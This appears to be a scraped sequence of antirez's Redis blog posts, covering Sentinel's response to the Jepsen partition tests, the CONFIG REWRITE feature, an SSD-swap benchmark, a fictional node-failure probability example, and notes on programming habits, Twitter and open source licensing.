Terah users have setups like the following, with three database nodes and three web servers running clients that send queries to the database nodes ("D" denotes a database node, "C" a client).

D D D

C C C

EDB is designed to avoid problems on partitions like this:

D1 | D D
   |
C1 | C C

C1 writing to D1 may result in lost writes if D1 happens to be the master.

However in Terah net splits are not an issue: they invented a solution for all network partitions back in Galactic Year 712! Still, their technology is currently not able to prevent single hosts from failing.

There is a sysop from Terah, Daniel Fucbitz, that always complains about EDB. He does not understand why on the Earth… oops, on the Terah I mean, his company keeps importing EDB, which causes a lot of troubles. He reasons like this: "If a single node of my network fails, I'm safe with both EDB and TDB, but what happens if one night I'm not lucky and two hosts fail at the same time?".

Actually with EDB, if two of the six nodes fail during the same night, and these nodes happen to be two "D" nodes, the system will stop working. The probability of this happening is (3/6)*(2/5), that is... 20%!

On the other hand TDB will never stop working as long as only two nodes fail.

And what about three nodes failing at the same time? With EDB this will bring the system down with a probability of 50% (at least two "D" nodes down) plus 5% (all clients down), for a total probability of 55%.

While TDB would stop working with a probability of just 5% (all the three DB nodes down), plus 15% (master plus two clients down, no promotion possible), plus 5% (all clients down), for a total of 25%.
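
These numbers are easy to verify by brute force, enumerating all the ways three of the six nodes can fail (a quick Python check; D1 plays the TDB master):

from itertools import combinations

nodes = ["D1", "D2", "D3", "C1", "C2", "C3"]   # D1 is the master

def edb_down(dead):
    d = sum(n[0] == "D" for n in dead)
    c = sum(n[0] == "C" for n in dead)
    return d >= 2 or c == 3   # majority of DB nodes lost, or no clients left

def tdb_down(dead):
    d = sum(n[0] == "D" for n in dead)
    c = sum(n[0] == "C" for n in dead)
    # All DB nodes down, all clients down, or master down without a
    # majority of clients left to promote a replacement.
    return d == 3 or c == 3 or ("D1" in dead and c >= 2)

cases = list(combinations(nodes, 3))
print(sum(edb_down(case) for case in cases) / len(cases))   # 0.55
print(sum(tdb_down(case) for case in cases) / len(cases))   # 0.25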

Daniel Fucbitz sometimes looks out of his office window, waiting for the third sun to rise, thinking that, yes, on planet Earth it is nice to resist partitions, but it really is not free at all.
Reply to Aphyr attack to Sentinel http://antirez.com/news/55 http://antirez.com/news/55 Sun, 19 May 2013 15:42:06 +0000
[1] http://aphyr.com/tags/jepsen

Postgres, Redis Sentinel, MongoDB, and Riak are audited to find out what happens during network partitions, and whether these systems can provide the claimed guarantees.

Redis is attacked here: http://aphyr.com/posts/283-call-me-maybe-redis

I said that Kyle "attacked" the systems on purpose, as I see a parallel with the world of computer security here: it is really a good idea to move this paradigm to the database world, to show the failure modes of systems against the claims of their vendors. Similarly to what happens in the security world, the vendor may take the right steps to fix the system when possible, or simply the user base will be able to recognize that under certain circumstances something bad is going to happen to their data.

Another awesome thing in Kyle's series is the educational tone: almost nothing is taken for granted, and the articles can be read by everyone, from people that never cared about databases to distributed systems experts. Well done!

In this blog post I'll try to address the points Kyle made about Redis Sentinel, which is the system he tested.

Sentinel goals
===

In the post Kyle writes "What are the consistency and availability properties of Sentinel?".
Probably this is the only flaw I saw in this article.

Redis Sentinel is a distributed *monitoring* system, with support for automatic failover.
It is in no way a shell that wraps N Redis instances into a distributed data store. So if you consider the properties of the "Redis data store + Sentinel", what you'll find is the properties of any Redis master-slave system where there is an external component that can promote a slave into a master under certain circumstances, but has limited abilities to change the fundamental fact that Redis, without Redis Cluster, is not a distributed data store.

However it is also true that Redis Sentinel also acts as a configuration device, and even relies on some help from clients, so as a whole it is a complex system with a given behavior that's worth analyzing.

What I'm saying here is just that the goal of the system is:

1) To promote a slave into a master if the master fails.
2) To do so in a reliable way.

All the stress here is on point "2", that is, the fact that Sentinels can be placed outside the master-slave system lets the user pick a more objective point of view from which to declare the master as failing.

Another property is that Sentinel is distributed enough that single Sentinels can fail at any time, including during the failover process, and the process will continue unaffected as long as it is still possible to reach a majority.

I think the goal of Redis Sentinel is pretty clear, so I'm surprised (not in a negative way) that it was tested by creating a partition where the old master is in the minority together with a client, and then showing that the client was still able to write to the old master. I honestly don't think any user expects something different from Redis Sentinel. That said, I'll ignore this fact from now on and reply to the different parts of the article, as there is important information anyway IMHO, especially since, after all, Redis Sentinel + N Redis instances + M clients is "A System", so Kyle's analysis makes sense even under my above assumptions.

Partitioning the cluster
===

Ok, I just made clear enough that Sentinel has no goal of turning N Redis instances into a distributed store, so basically what happens is that:

1) Clients in the majority side will be able to continue to write once the failover is complete.
2) Clients in the minority side may possibly write to the old master, and when the network is ok again, the master will be turned into a slave of the new master, so all the writes in the minority side are lost forever.

So you can say: ok, Sentinel has a limited scope, but could you add a feature so that when the master feels it is in the minority it no longer accepts writes? I don't think it's a good idea. What does it mean to be in the minority for a Redis master monitored by Sentinels (especially given that Redis and Sentinel are completely separate systems)?

Do you want your Redis master to stop accepting writes when it is no longer able to replicate to its slaves? Or when enough Sentinels are down? My guess is that, given the goals of the system, instead of going down the road of stopping the master for possibly harmless conditions (or conditions not as bad as a stopped master), we should just use the fact that Sentinel is very configurable: place your Sentinels and set your quorum so that you are defensive enough against partitions. This way the system will activate only when the issue really is the master node being down, not a network problem. Fear data loss and partitions? Have 10 Linux boxes? Put a Sentinel in every box and set the quorum to 8.
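
For instance, something along these lines in every box's sentinel.conf (the master name and address are illustrative):

sentinel monitor mymaster 192.168.1.100 6379 8
sentinel down-after-milliseconds mymaster 30000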

Just to be clear, the criticism is a good one, and it shows how Sentinel is not suited to handle complex net splits with minimal data loss. But this was never the goal, and what users were doing with their home-made failover scripts was in 99% of cases much worse than what Sentinel achieves in failure detection and handling of the failover process.

Redis consensus protocol
===

Another criticism is that the Sentinel protocol is complex to analyze, and even requires some help from the client.

It is true that it is a complex protocol to analyze, because while the agreement is vaguely Byzantine-looking, it is actually a dynamic process without an ordered number of steps to reach an agreement. The state about different things, like whether a node is failing or not, and who should perform the promotion, is simply broadcast continuously among Sentinels.

A majority is basically reached when the state of N nodes (with N >= quorum), no older than a given number of seconds, agrees about something.

Both failure detection and the election of the Sentinel doing the failover are reasonable candidates for this informal protocol, since the information every Sentinel has about the availability of a given instance, or of another Sentinel, is itself a moving target. Also, the rest of the system is designed to be resistant against errors in the agreement protocol (the first Sentinel recognizing a failure will force all the others to recognize it, and the failover process is auto-detected by the other instances, which can monitor the elected slave. Care is also taken so that the protocol is not fragile against multiple Sentinels performing the failover at the same time, if this should ever happen).

Kyle notes that there is the concept of TILT, so that Sentinel is sensitive to clock skew and desynchronization. Actually there is no explicit use of absolute time in the protocol, nor are Sentinels required to have synchronized clocks at all.

Just to clarify, TILT is a special mode that is used when a Sentinel detects that its internal state is compromised in one of two ways: either the system clock jumped into the past, so the Sentinel can no longer trust its *internal* state, or the clock appears to have jumped into the future, which means the Sentinel process was blocked for a long time for some reason. In both cases such a Sentinel will enter TILT mode, so it will stop acting for some time, until its state is believed to be reliable again. TILT is basically not part of the Sentinel protocol, but just a programming trick to make the system more reliable in the presence of strange behaviors from the operating system.
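Conceptually the detection is as simple as the following sketch (this is just an illustration of the idea, not the actual Sentinel code; the constants and names are made up):

import time

TILT_TRIGGER = 2.0   # seconds: a bigger gap between ticks is suspicious
TILT_PERIOD = 30.0   # how long to act passively once tilted

last_tick = time.time()
tilt_until = 0.0

def timer_tick():
    global last_tick, tilt_until
    now = time.time()
    delta = now - last_tick
    if delta < 0 or delta > TILT_TRIGGER:
        # The wall clock jumped backward, or the process was blocked
        # too long: timing-related internal state can't be trusted.
        tilt_until = now + TILT_PERIOD
    last_tick = now
    return now < tilt_until  # True means: we are in TILT mode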

Involvement of the clients
===

In Sentinel, client involvement is not mandatory, since you may want to run a script during a failover so that the configuration changes in some permanent way.

However the suggested mode of operation is to use clients that refresh the information when a reconnection is needed (actually we are going in the direction of forcing a periodic state refresh, and when Sentinel demotes a reappearing old master we'll send a command to the old master that forces all the connections to be dropped; this improves the reliability of the system in a considerable way).

So in the article I can read:

* Sentinels could promote a node no clients can see
* Sentinels could demote the only node clients can actually reach
* …

And so forth. Again, the point here is that Sentinel is designed exactly to let you pick your tradeoffs from that point of view, and the documentation suggests that your Sentinels stay on the same machines where you run your clients, web servers, and so forth, not on the Redis server nodes.

Because indeed, almost always, the point of view from which you want to declare something "down" is the point of view of the client.

Broken things Kyle did not investigate
===

Kyle did great work showing what you should *not* expect from Sentinel.

There is much more we have to fix, because HA is a complex problem in master -> slave systems. For instance, the current version of Sentinel does not handle well enough reconfigured instances that reboot with an old config: sometimes you may just lose a slave that is ignored by Sentinels.

This and other problems are still a work in progress, and what I'm trying to provide with Redis Sentinel is a monitoring and failover solution that does not suck too much, as in: you can select the point of view of what "down" means, both topologically and as a quorum, and you can be sure that a few Sentinels going away will not break your failover process.

Redis Cluster
===

Redis Cluster is a system much more similar to what Kyle had in mind when testing Sentinel. For instance, after a split, the minority side of the partition will stop accepting writes, so while there is always a window for data loss, in the big picture of things there is always only a single part of the network that accepts writes.

I invite you to read the other articles in Kyle's series, they are very informative.

Thank you Kyle, please keep attacking databases.
http://antirez.com/news/55
Redis configuration rewriting http://antirez.com/news/54 http://antirez.com/news/54 Mon, 13 May 2013 15:41:46 +0000 Redis 2.8 will not contain Redis Cluster, and its implementation of Redis Sentinel is the same as in the 2.6 and unstable branches (Sentinel is kept mostly in sync across all the branches, being fundamentally a different project that uses Redis just as a framework).

However there are many new interesting features in Redis 2.8 that were back ported from the unstable branch. Basically 2.8 is our usual "in the middle" release, like 2.4 was: while waiting for Redis 3.0, which will feature Redis Cluster (we are making great progress on it! See https://vimeo.com/63672368), we'll have a 2.8 release with everything in the unstable branch that is ready to be released. The goal is of course to put more things in the hands of users ASAP.

The big three new entries in Redis 2.8 are replication partial resynchronization (already covered in this blog), keyspace event notifications via Pub/Sub, and finally CONFIG REWRITE, a feature I just finished implementing (you can find it in the config-rewrite branch at Github). This post explains what CONFIG REWRITE is.

An inverted workflow
===

Almost every unix daemon works like that:

1) You have a configuration file.
2) When you need to hack the configuration, you modify it and either restart the daemon, or send it a signal to reload the config.

It's been this way forever, but with Redis I took a different path from the start: as soon as I understood that people were creating "farms" of Redis servers, either to provision them on-demand or for internal usage where a big number of Redis servers is needed, I really wanted to provide a different paradigm that was more "network oriented".

This is why I introduced the CONFIG command, with its subcommands GET and SET. At the start the abilities of CONFIG were pretty basic, but now you can reconfigure almost every aspect of Redis on the fly, just by sending commands to the server. This goes as far as being able to change the persistence type while an instance is running. For example, just typing:

CONFIG SET appendonly yes

will switch on the Append Only File, start a rewrite process to create the first AOF, and so forth. Similarly it is possible to alter everything from replication to memory limits and policy while the server is running, just by interacting with the server via normal commands, without any "hook" inside the operating system running Redis.

The symmetrical command CONFIG GET is used to query the configuration. Some users are more conservative in how they handle their servers and may want to always touch the configuration manually, but my idea was that the two commands provide quite a powerful system to handle a large number of instances in a scriptable way, without additional software layers, and avoiding restarts of the server, which are costly, especially in the case of an in-memory database.
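For example, a typical interaction looks like this (the values shown are just illustrative):

redis 127.0.0.1:6379> config get maxmemory
1) "maxmemory"
2) "0"
redis 127.0.0.1:6379> config set maxmemory 100mb
OK
redis 127.0.0.1:6379> config get maxmemory
1) "maxmemory"
2) "104857600"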

However there was a major issue: after you modified an important configuration parameter with CONFIG SET, you later had to apply the change to the redis.conf file manually, so that after a restart Redis would use the new config. As you can guess this was a huge limitation: basically the CONFIG API was only useful to change the config live and avoid a reboot, but manual intervention, or some other software layer handling the configuration of your servers, was needed anyway.

So the idea to solve this issue was to add, as soon as possible, a new command, CONFIG REWRITE, that would rewrite the Redis configuration file to reflect the changes in memory.
So the new workflow would be like that:

CONFIG SET appendonly yes
CONFIG REWRITE

Initially I was trying to do a complete refactoring of the config.c file in order to implement this feature easily, but this was the best recipe to delay the feature forever… Finally I decided to implement it before the 2.8 release, without waiting for a refactoring, but implementing the new feature in a way that is refactor-friendly. So basically, we finally have it!

I believe that now that CONFIG REWRITE completes the triad of the configuration API, users will greatly benefit from it: small users will be able to make configuration changes from redis-cli in a very reliable way, without a restart and without the possibility of syntax errors in redis.conf, and big users will of course find it very useful for scripting a large farm of Redis instances.

Before continuing: if you want to play with CONFIG REWRITE, clone the config-rewrite branch at Github (the feature will be merged into 2.8 and unstable soon), and play with it.

A gentle rewrite
===

Rewriting a configuration file is harder than it seems at first. Actually, doing a brutal rewrite is trivial: you just write every configuration parameter with its current value into the new file, and you are done. But this has a number of side effects:

1) User comments and the overall redis.conf structure go away, lost forever.
2) You get a number of things set explicitly to their default values.
3) After a server upgrade, because of point 2, you may keep running an old default value that has since changed.

So CONFIG REWRITE tries to follow a set of rules to make the rewriting more gentle, touching only the minimum possible, and preserving everything else.

This is how it works:

1) Comments are always preserved.
2) If an option was already present in the old redis.conf, the same line is used for the same option in the new file.
3) If an option was not present and is set at its default value, it is not added.
4) If an option was not present, but the new value is no longer its default, the option is appended at the end of the file.
5) All the no longer useful lines in the old configuration file are blanked (for example if there were three "save" options, but only two are used in the new config).

However if the configuration file for some reason no longer exists, CONFIG REWRITE will create it from scratch. The rules followed are the above anyway, just assuming an empty old configuration file, so the effect is to produce a configuration file containing only the options not set to their default value.
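Just to fix ideas, this is a rough sketch of the algorithm in Python; the real logic lives in config.c and differs in the details, but the rules map one to one:

def rewrite_config(old_lines, options, defaults):
    # options: option name -> list of current values (options like "save"
    # can take multiple lines); defaults: option name -> default values.
    out = list(old_lines)
    used = {}  # how many lines per option were rewritten in place
    for i, line in enumerate(old_lines):
        name = line.strip().split(' ', 1)[0] if line.strip() else ''
        if not name or name.startswith('#'):
            continue  # rule 1: comments (and blank lines) are preserved
        vals = options.get(name, [])
        n = used.get(name, 0)
        if n < len(vals):
            out[i] = '%s %s' % (name, vals[n])  # rule 2: reuse the old line
            used[name] = n + 1
        else:
            out[i] = ''  # rule 5: no longer useful lines are blanked
    for name, vals in options.items():
        if name not in used and vals == defaults.get(name):
            continue  # rule 3: absent options at their default are skipped
        for v in vals[used.get(name, 0):]:
            out.append('%s %s' % (name, v))  # rule 4: append at the end
    return out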

An example
===

Just to make everything a bit more real, here's an example.

I start Redis with the following configuration file:

---
# This is a comment
save 3600 10
save 60 10000

# Hello world
dir .
---

After a CONFIG REWRITE without changing any parameter what I see is:

---
# This is a comment
save 3600 10
save 60 10000

# Hello world
dir "/Users/antirez/hack/redis/src"
---

As you can see, the only difference is that "dir" was turned into an absolute path, only because it was not one already. The path is also quoted inside "", as certain options are rewritten in a form that supports special characters.

At this point I use the following commands:

redis 127.0.0.1:6379> config set appendonly yes
OK
redis 127.0.0.1:6379> config set maxmemory 10000000
OK
redis 127.0.0.1:6379> config rewrite
OK

Now the configuration file looks like that:

---
# This is a comment
save 3600 10
save 60 10000

# Hello world
dir "/Users/antirez/hack/redis/src"

# Generated by CONFIG REWRITE
maxmemory 10000000
appendonly yes
---

As you can see new configurations are appended at the end.

Finally I make a change that requires deleting some previous line:

redis 127.0.0.1:6379> config set save ""
OK
redis 127.0.0.1:6379> config rewrite
OK

The new config file is the following:

---
# This is a comment

# Hello world
dir "/Users/antirez/hack/redis/src"

# Generated by CONFIG REWRITE
maxmemory 10000000
appendonly yes
---

Comments are preserved but multiple blank lines are squeezed to a single one.

Thanks for reading!
http://antirez.com/news/54
Hacking Italia http://antirez.com/news/53 http://antirez.com/news/53 Mon, 06 May 2013 15:41:23 +0000
Hacking Italia is a "social news" site, very similar to Hacker News, the famous news aggregator for hackers run by YCombinator. What is the point of an Italian site, in Italian, when there is already much more and much better in the international landscape? To bring together a critical mass of the "right" people in Italy.

Bringing people together means a lot, especially in a country that is narrow and 1500 kilometers long, where the occasions for programmers and startup founders to meet are rare, and investors are hidden in who knows which buildings, inaccessible to most. I've been doing this job for 15 years and I know very few people in Italy, and plenty in the rest of the world... and this is certainly not a country lacking passion for code and innovation, as history reminds us.

So getting together means, to start with, already having a small showcase of people to present your idea to. It also means discussing topics that are of no interest to those who don't operate in our territory, like company legal forms and the thousand bureaucratic problems we have to deal with. Moreover, while creating a clone of globally established services like Youtube or Gmail for the Italian market is probably an operation without any merit, this does not mean there are no potential startups targeting the Italian territory that could be very successful: news, restaurants, business to business, medicine... there are countless areas where economies of scale allow those operating in Italy to do better for Italians.

So if these topics are important to you too, spread the word, register, and give your contribution.

A bit of background to finish. The project was born thanks to the fact that, for a few weeks now, here in Catania we programmers have started to meet up. We grab a beer and talk about hacking, and more. To tell the truth, I never thought this could happen: talking about really technical (and interesting) things a few kilometers from my home. And from those chats this idea was born... so thanks to Angelo, Fabio, Geert, Giuseppe, Marcello, and see you both at the pub and on the new site!
http://antirez.com/news/53
Redis with an SSD swap, not what you want http://antirez.com/news/52 http://antirez.com/news/52 Wed, 06 Mar 2013 15:41:02 +0000
The setup: a Linux box with 24 GB of RAM, with two disks.

A) A spinning disk.
B) An SSD (Intel 320 series).

The idea is: what happens if I set the SSD disk partition as a swap partition and fill Redis with a dataset larger than RAM?
I had wanted to run this test for a long time, especially now that the Redis focus is on RAM only and I abandoned the idea of targeting disk, for a number of reasons.

I already guessed that the SSD swap setup would perform badly, but I was not expecting it to be *so bad*.

Before testing this setup, let's start by testing Redis in memory, on the same box, with a 10 GB data set.

IN MEMORY TEST
===

To start I filled the instance with:

./redis-benchmark -r 1000000000 -n 1000000000 -P 32 set key:rand:000000000000 foo

The write load generated this way is very high, more than half a million SET commands processed per second using a single core:

instantaneous_ops_per_sec:629782

This is possible because we are using a pipeline of 32 commands at a time (see -P 32), which limits the number of syscalls involved in the processing of commands, as well as the network latency component.
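As a reference, the same kind of pipelining is easy to use from a normal client too; for instance with the redis-py client (just an illustration, not the benchmark code):

import redis

r = redis.Redis(host='localhost', port=6379)
pipe = r.pipeline(transaction=False)  # plain pipelining, no MULTI/EXEC
for i in range(32):
    pipe.set('key:%d' % i, 'foo')
pipe.execute()  # all 32 commands travel in a single round trip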

After a few minutes I reached 10 GB of memory used by Redis, so I tried to save the DB while still sending the same write load to the server, to see what the additional memory usage due to copy-on-write would be under such stress conditions:

[31930] 07 Mar 12:06:48.682 * RDB: 6991 MB of memory used by copy-on-write

Almost 7 GB of additional memory used, that is, 70% more memory.
Note that this is an interesting value, since it is exactly the worst case scenario you can get with Redis:

1) Peak load of more than 0.6 million writes per second.
2) Writes are completely distributed across the data set, there is no working set in this case, all the DB is the working set.

But given the enormous pressure on copy-on-write exerted by this workload, what is the write performance while the system is saving? To find out, I started a BGSAVE and at the same time started the benchmark again:

$ redis-cli bgsave; ./redis-benchmark -r 1000000000 -n 1000000000 -P 32 set key:rand:000000000000 foo
Background saving started
^Ct key:rand:000000000000 foo: 251470.34

250k ops/sec was the lowest number I was able to get: once copy-on-write starts to happen, there is less and less copying happening every second, and the benchmark soon returns to 0.6 million ops per second.
The number of keys was in the order of 100 million here.

Basically the result of this test is, with real hardware and persisting to a normal spinning disk, Redis performs very well as long as you have enough RAM for your data, and for the additional memory used while saving. No big news so far.

SSD SWAP TEST
===

For the SSD test we still use the spinning disk attached to the system in order to persist, so that the SSD is just working as a swap partition.

To fill the instance even more I just started redis-benchmark again with the same command line, since with those specific parameters, if left running forever, it would set 1 billion keys, which is enough :-)

Since the instance has 24 GB of physical RAM, for the test to be meaningful I wanted to add enough data to reach 50 GB of used memory. In order to speed up the process of filling the instance I disabled persistence for some time using:

CONFIG SET SAVE ""

While filling the instance, at some point I started a BGSAVE to force some more swapping.
Then when the BGSAVE finished, I started the benchmark again:

$ ./redis-benchmark -r 1000000000 -n 1000000000 -P 32 set key:rand:000000000000 foo
^Ct key:rand:000000000000 foo: 1034.16

As you can see, the results were very bad initially; probably the main hash table ended up swapped. After some time it started to perform decently again:

$ ./redis-benchmark -r 1000000000 -n 1000000000 -P 32 set key:rand:000000000000 foo
^Ct key:rand:000000000000 foo: 116057.11

I was able to stop and restart the benchmark multiple times and still get decent performance on restarts, as long as I was not saving at the same time. However performance continued to be very erratic, jumping from 200k to 50k sets per second.

…. and after 10 minutes …

It only went from 23 GB of memory used to 24 GB, with 2 GB of data set swapped on disk.

As soon as a few GB were swapped, performance became simply too poor to be acceptable.

I then tried with reads:

$ ./redis-benchmark -r 1000000000 -n 1000000000 -P 32 get key:rand:000000000000
^Ct key:rand:000000000000 foo: 28934.12

Same issue, 30k ops per second both for GET and SET, and *a lot* of swap activity at the same time.
What's worse is that the system was pretty unresponsive as a whole at this point.

At this point I stopped the test: the system was slow enough that filling it even more would require a lot of time, and performance got worse as more data was swapped.

WHAT HAPPENS?
===

What happens is simple: Redis is designed to work in an environment where random memory access is very fast.
Hash tables, and the way Redis objects are allocated, are all based on this concept.

Now let's take a look at the Intel 320 SSD specifications:

Random write (100% Span) -> 400 IOPS
Random write (8GB Span) -> 23000 IOPS

Basically what happens is that at some point Redis starts to force the OS to move memory pages between RAM and swap at *every* operation performed, since we are accessing keys at random and there are no more spare pages. With random I/O in the range of a few hundred to a few tens of thousands of IOPS, as per the specs above, throughput gets capped far below what RAM can deliver, which matches the numbers observed in the test.

CONCLUSION
===

Redis is completely useless used in this way. Systems designed to work in this kind of setup, like Twitter fatcache or the recently announced Facebook McDipper, need to be SSD-aware, and can probably work reasonably well only when a simple GET/SET/DEL model is used.

I also expect that the pathological case for these systems, that is, evenly distributed writes with a big span, is not going to be excellent because of current SSD limits, but that's exactly the case Redis is trying to solve for most users.

The freedom Redis gets from the use of memory allows us to serve much more complex tasks at very good peak performance and with minimal system complexity and underlying assumptions.

TL;DR: the outcome of this test was expected and Redis is an in-memory system :-)
http://antirez.com/news/52
Log driven programming is a real productivity booster. http://antirez.com/news/51 http://antirez.com/news/51 Tue, 26 Feb 2013 15:40:42 +0000
If you ever wrote a complex piece of code you know what happens after some time: your mental model of the software becomes very complex, with different ideas nested inside other ideas, just like the structure of your program, after all.

So while you are writing this piece of code, you realize that because of it you need to make that other change. Something like: "I'm freeing this object here, but it's connected to these two other objects and I need to do this and that in order to ensure a consistent state".

The worst thing you can do is to interrupt what you are currently doing in order to fix the new problem. Instead just write freeMyObject() and don't care, but at the same time, open a different editor, and write:

* freeMyObject() should make sure to remove references from XYZ bla bla bla.

When you are finished with the current function / task / whatever, re-read your notes and implement what can be implemented. You'll get new ideas or new things to fix: use the same trick again, and log your ideas without interrupting the flow.

In this way parts of the program make sense individually. You can address the other parts later. This is 100 times better than nested thinking, where you need to stop, do another task, and come back. Humans don't have stack frames.

For my log I use Evernote, because the log needs to have one characteristic: no saving, no filenames, nothing more than typing something. Evernote will save it for you, and it is a different physical interface compared to your code editor. This, in my experience, improves the two-second switch you need in order to log.

After some time your log starts to get long. When you realize most of it feels old, as your code base and your idea of the system have evolved, draw a line like this:

-------------------- OLD STUFF ---------------------

And continue logging again. From time to time, however, re-read your old logs. You may find some gems.
http://antirez.com/news/51
An idea for Twitter http://antirez.com/news/50 http://antirez.com/news/50 Tue, 26 Feb 2013 15:40:24 +0000
But the good outcome is that I have now created a @redisfeed account that I use to provide a stream of information to Redis users who are not interested in my personal tweets unrelated to Redis. Anyway, when I say something important about Redis with my personal account, I just retweet it on the other side, so this is a good setup.

However... I wonder if Twitter is missing an opportunity for providing a better service here, that is, the concept of "channels".

Basically I'm a single person, but I have multiple logical streams of information:

1) I tweet about Redis.
2) I tweet about other technological stuff.
3) I say things related to my personal life.
4) Sometimes I tweet things in Italian.

Maybe there are followers interested in just one or a few of these logical channels, so it would be cool for Twitter users to be able to follow only a subset of the channels of another Twitter user.

Probably this breaks the simplicity of Twitter, but I'm pretty sure there are ways to present such a feature in an interesting way: by default all users have a single channel, and following them means following all their channels; only as a refinement, and only if the user created multiple channels, can you fine-tune what you follow and what not. So basically the added complexity would be minimal.

I'm pretty sure that, now that Twitter is designed with the average user in mind, such a feature will actually never be implemented, not to mention that it may add some serious technological complexity to their infrastructure. But maybe in the long run such a feature may be more vital than we believe now, because it is pretty related to the "information diet" concept.
http://antirez.com/news/50
News about Redis: 2.8 is shaping, I'm back on Cluster. http://antirez.com/news/49 http://antirez.com/news/49 Wed, 13 Feb 2013 15:40:06 +0000
1) I finished the Partial Resynchronization patch (aka PSYNC) and merged it into the unstable and 2.8 branch. You can read more about it here: http://antirez.com/news/47
2) We finally have keyspace changes notifications: http://redis.io/topics/notifications

Everything is already merged into our development branches, so the deal is closed, and Redis 2.8 will include both features.

I'm especially super excited about PSYNC, as this is a non-feature: you simply don't have to deal with it, the only change is that slaves work A LOT better. I love adding stuff that is transparent to users, just making the system better and more robust.

What I'm even more excited about is the fact that now that PSYNC and notifications are into 2.8, I'll mostly freeze it and can finally focus on Redis Cluster.

I've been waiting to finish Redis Cluster for a long time; now it's the right moment, because Redis 2.6 is out and seems very stable, and people are just starting to really discover it, and the ways Lua scripting and the advanced bit operations make it possible to do more. Redis 2.8 is already consolidated as a release, but requires a long beta stage because we touched the inner workings of replication. So I can pause other incremental improvements for a bit to focus on Redis Cluster. Basically my plan is to work mostly on Cluster until it reaches beta quality, and by beta quality I mean something that brave users may put into production.

Today I already started to commit new stuff to the Cluster code. Hash slots are now 16384 instead of 4096, which means we are now targeting clusters of ~1000 nodes. This decision was taken because there are big Redis users already running a few hundred nodes.
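For reference, the key -> slot mapping is conceptually trivial; it can be sketched in Python like this (a sketch: Redis Cluster hashes the key with CRC16 and takes it modulo the number of slots, and binascii.crc_hqx with a zero seed computes the same CRC16/XMODEM variant):

import binascii

def key_hash_slot(key: bytes) -> int:
    # Every key deterministically maps to one of the 16384 slots,
    # and each node of the cluster serves a subset of the slots.
    return binascii.crc_hqx(key, 0) % 16384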

Another change is that probably, in order to ship Cluster ASAP, in the first stage I plan to use Redis Sentinel in order to failover master nodes (but Sentinel will be able to accept as configuration a list of addresses of cluster nodes and will fetch all the other nodes using CLUSTER NODES).

So basically the first version of Redis Cluster to hit a stable release will have the following features:

1) Automatic partition of key space.
2) Hot resharding.
3) Only single key operations supported.

The above is already implemented, but there is more work to do in order to move all this from alpha to beta quality. There is also a significant amount of work to do in client libraries, and I'll try to provide an initial reference implementation based on redis-rb (actually I hope to just write a wrapper library).

Note that "3" is here to stay: there are currently no plans to extend Cluster to anything requiring keys to be moved back and forth magically. But MIGRATE COPY will provide a way for users to move keys into spare instances to perform computations with multiple keys.

Of course all this is modulo critical bugs. If there is something odd with stable releases I'll stop everything and fix it as usual :-)
http://antirez.com/news/49
A few thoughts about Open Source Software http://antirez.com/news/48 http://antirez.com/news/48 Sat, 26 Jan 2013 15:39:43 +0000
First of all, open source for me is not a way to contribute to the free software movement, but to contribute to humanity. This means a lot of things; for instance, I don't care what people do with my code, nor whether they'll release their modifications back. I simply want people to use my code in one way or the other.

Especially, I want people to have fun, learn new stuff, and *make money* with my code. For me, other people making money out of something I wrote is not something I lost; it is something I gained.

1) I'm having a bigger effect on the world if somebody can pay the bills using my code.
2) If there are N subjects making money with my code, maybe they will be happy to share some of this money with me, or will be more willing to hire me.
3) I can myself be one of the subjects making money with my code, and with other open source code.

For all these reasons my license of choice is the BSD license, which is the perfect incarnation of "do whatever you want" as a license.

However clearly not everybody thinks alike, and many programmers contributing to open source don't like the idea that other people can take the source code and build a business out of it, as a commercial product that is not released under the same license.
To me, instead, many of the rules that you need to follow to use the GPL license are a practical barrier reducing the actual freedom of what people can do with the source code. Also I have the feeling that receiving contributions back is not that related to the license: if something is useful, people will contribute back in some way, because maintaining forks is not great. The real gold is where development happens. Unfixed, non-evolving code bases are worth zero. If you as an open source developer can provide value, other parties will be more stimulated to get their changes incorporated.

Anyway, I'm much happier with fewer patches merged and more freedom from the point of view of the user than with the reverse, so there is not much to argue about for me.

In my opinion, what open source does not get back in a fair amount is money, not patches. The new startup movement, and the low operating costs of many large IT companies, are based on the existence of so much open source code that works well. Businesses should try to share a small fraction of the money they earn with the people who wrote the open source software that is a key factor in their success, and I think that a sane way to redistribute part of the money is to hire those people to just write open source software (like VMware did with me), or to provide donations.

Many developers do a lot of work in their free time out of passion; only a small percentage happen to be paid for their contribution to open source. Some redistribution may allow more people to focus on the code they write out of passion, which possibly has a much *more important effect* on the economy compared to what they do at work to earn their salary every month. And unfortunately it is not possible to pay bills with pull requests, so while helping a project with source contributions is a good and sane thing to do, it is not enough in my opinion.

You can see all this from a different point of view, but what I see is that a lot of the value in the current IT industry is provided by open source software, often written in someone's spare time, or with important efforts filling the time gaps between one work task and another, if your employer is kind enough to allow you to do so.

What I think is that this is economically suboptimal: a lot of smart coders could provide an economic boost if they were more free to write what they love, which is what a lot of people are probably already using to make money.
http://antirez.com/news/48
PSYNC http://antirez.com/news/47 http://antirez.com/news/47 Wed, 16 Jan 2013 15:39:22 +0000
This is exactly what I'm going to do from the point of view of the big picture; however, there are many smaller features that make a big difference from the point of view of the Redis user's day to day operations. Such features can't be ignored either. They are less shiny in a feature list, they are not good at generating buzz and interest in new users, and they are sometimes boring to code, but they are very important from a practical point of view.

So I ended the year, and I'm starting the new one, spending considerable time on a feature long awaited by many users with production instances crunching data every day: the ability for a slave to partially resynchronize with the master, without requiring a full resynchronization every time.

The good news is that today I finally have an implementation that works well in my tests. This means that this feature will be present in Redis 2.8, so it is the right time to start making users aware of it, and to describe how it works.

Some background
---

Redis replication is a pretty brutal piece of code in many ways:

1) It works by re-playing on slaves every command received by the Redis master that actually produced a change in the data set.
2) From the point of view of slaves, masters are just slightly special clients, but they are almost like normal clients sending commands. No special replication protocol or data format is used for replication.
3) It *used to force* a full resynchronization every time a slave connects to a master. This means that, at every connection, the slave will receive a copy of the master data set, in the form of an RDB file, and load it.

Because of these characteristics, Redis replication has been very reliable from the point of view of corruption. If you always full-resync, there is little chance of inconsistency. Also it was architecturally trivial, because masters are like clients, no special protocol is used, and so forth.

Simple and reliable, what can go wrong? Well, what goes wrong is that sometimes, even when simplicity is very important, doing O(N) work when zero work is needed is not a good idea. I'm looking at you, point three of my list.

Consider the following scenario:

* Slave connects to the master, and performs a full resync.
* Master and slave chat for one hour.
* Slave disconnects from the master for 2 seconds, because of some silly network issue.

